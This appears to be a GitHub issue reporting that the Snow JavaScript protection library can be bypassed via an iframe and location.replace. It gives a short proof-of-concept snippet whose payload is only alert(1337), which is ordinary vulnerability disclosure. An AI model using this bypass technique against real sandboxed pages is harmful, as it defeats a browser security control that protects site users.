Skip to content

Snow can be bypassed with location.replace #154

@hackvertor

Description

@hackvertor
setInterval(x=>xyz.alert(1337))
i=document.createElement('iframe');
i.src='about:blank';
i.name='xyz';
document.body.append(i);
setTimeout(x=>i.contentDocument.location.replace(123));

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions